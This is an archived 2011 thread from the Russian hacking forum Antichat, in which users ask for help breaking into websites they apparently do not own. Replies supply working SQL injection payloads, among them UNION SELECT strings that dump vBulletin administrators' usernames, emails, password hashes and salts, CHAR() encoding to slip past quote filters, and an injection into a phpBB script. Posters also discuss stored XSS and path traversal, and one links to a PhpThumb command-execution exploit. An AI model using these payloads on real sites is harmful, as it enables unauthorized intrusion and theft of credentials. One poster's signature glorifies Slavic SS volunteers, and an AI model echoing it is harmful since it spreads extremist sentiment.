ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.08.2011, 23:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
10960
Репутация:
0
|
|
Сообщение от .:GOGA:.
.:GOGA:. said:
Есть Бд с именем fotoforum
Делаю запрос
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fotoforum[/COLOR][/COLOR]
Он возвращает ответ Unknown column 'fotoforum' in 'where clause' Как это понять?? Нужно так:
Код:
Code:
SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA='fotoforum'
Если же фильтруются кавычки, можно зачарить:
Код:
Code:
SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=CHAR(102,111,116,111,102,111,114,117,109)
|
|
|
|
11.08.2011, 12:55
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Есть уязвимый форум на vBulletin . При просмотре администраторов через:
Код:
Code:
форум/showgroups.php
в группе Администраторы 3 человека.
Но когда в Live HTTP дописываю:
Код:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6#
то мне выдает всего 1 админа.
Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида? |
|
|
11.08.2011, 14:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Cherep
Cherep said:
Есть уязвимый форум на vBulletin . При просмотре администраторов через:
Код:
Code:
форум/showgroups.php
в группе Администраторы 3 человека.
Но когда в Live HTTP дописываю:
Код:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6#
то мне выдает всего 1 админа.
Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида? а если попробовать LIMIT ?
Код:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 0,1#
Код:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 1,1#
Код:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 2,1#
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
11.08.2011, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от ne0k
ne0k said:
Наткнулся на код, в котором значение из $_GET напрямую передается в класс PhpThumbFactory::create.. В этом классе происходит проверка на валидность входного IMG файла.. Т.е, если я подставляю:
?filename=/../../1.jpg , отображается соответственно сама картинка, находящаяся в корне.. При попытке прочитать реальную JPG, GIF, PNG, читается из любого места.. А вот прочитать файл другого формата не удается, все это проверяется, и мозгов у меня пока не хватает, чтобы сделать какие либо выводы..
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]resize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$width[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$height[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$thumb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$thumb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]destruct[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
Существуют ли методы обхода, или как можно заставить PHP код выполниться в реальном IMG файле? И вообще, уязвимость ли это, или просто фича?
php 5.3.6
З.ы.:magic_quotes_gpc=Off,
З.ы.ы.: Проверка идет по mime типу и еще по нескольким параметрам.. Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:
http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/
|
|
|
|
11.08.2011, 18:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
на сайте есть пассивная xss в урле...но там идет только замена спец символов на их коды. больше никаких фильтров нет(100%) можно использовать как нибудь?
|
|
|
|
11.08.2011, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
я реализовал xss, радовался жизнИ, потом админ поставил замену спец символов на html код.
|
|
|
|
11.08.2011, 20:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
10960
Репутация:
0
|
|
Сообщение от None
Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:
http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/
Интересно.. Поиграюсь вечером..
Есть еще вопрос. Возможно ли провести sql inj при INSERT в БД данных из массива? При этом, данные, в массиве из $_POST, и ни коем образом не фильтруются...
Вот так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TABLE[/COLOR][COLOR="#007700"],
array([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]),
[/COLOR][COLOR="#DD0000"]'created'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d"[/COLOR][COLOR="#007700"]),
[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]]));
[/COLOR][/COLOR]
Смог реализовать активную XSS.. Данные инсертятся в БД без какой либо фильтрации, соответственно потом, при выборке title и или description, срабатывает XSS на странице..
Но нужен скуль..
Может что еще можно сделать тут? Думаю, как бы реализовать выполнение кода, но к сожалению, страница, которая отображает содержимое этих двух ячеек, никак не воспринимается интэрпритатором php, т.е. если отправить постом '' а потом вывести на страницу, то будет просто навсего пустой тайтл или дискрипшн.. А в сорцах страницы отображается как есть: ....
Пока не знаю куда рыть дальше..
----------------------------------------------
Переменная $type получает свое значение из $_GET[type], но фильтруется :
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(!empty=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]];
}
[/COLOR][/COLOR]
и тут никак не пробиться, поэтому остается надеяться на $_POST[title] и $_POST[description] ...
|
|
|
|
11.08.2011, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
8683
Репутация:
-5
|
|
извиняюсь если ошибся темой. колупал сегодня один форум.
методом подбора нашел в корневой файл tester.php
вот отрывок из него:
Сообщение от None
Fix bug_user privmsgs
2->11 total unreadprvmsgs- 18513->0 total unreadprvmsgs- 3->1 total unreadprvmsgs- 4->0 total unreadprvmsgs- 5->0 total unreadprvmsgs- 6->0 total unreadprvmsgs- 7->0 total unreadprvmsgs- 8->0 total unreadprvmsgs- 9->0 total unreadprvmsgs- 10->0 total unreadprvmsgs- 11->0 total unreadprvmsgs- 13->1 total unreadprvmsgs- 14->0 total unreadprvmsgs- 17->0 total unreadprvmsgs- 18->0 total unreadprvmsgs- 19->0 total
и дальше бла бла бла...
при запросе: tester.php?=start=2000'
выдает следующее
Сообщение от None
phpBB : Критическая ошибка Error doing DB query userdata row fetch DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 1' at line 4 SELECT user_id, username, user_unread_privmsg FROM users WHERE user_active = 1 LIMIT 2000', 1 Line : 26 File : test.php
вопрос можно ли дальше что-то сделать? |
|
|
|
11.08.2011, 22:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Tiku$
Tiku$ said:
извиняюсь если ошибся темой. колупал сегодня один форум.
методом подбора нашел в корневой файл tester.php
вот отрывок из него:
при запросе: tester.php?=start=2000'
выдает следующее
вопрос можно ли дальше что-то сделать?
tester.php?start=2,22222222+union+select+1,2,3--+
|
|
|
|
11.08.2011, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
8683
Репутация:
-5
|
|
Expl0ited,
Сообщение от None
504 Gateway Time-out
nginx/0.7.67
Moriarty, не подскажешь может статья какая-то есть? а то я первый раз)) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
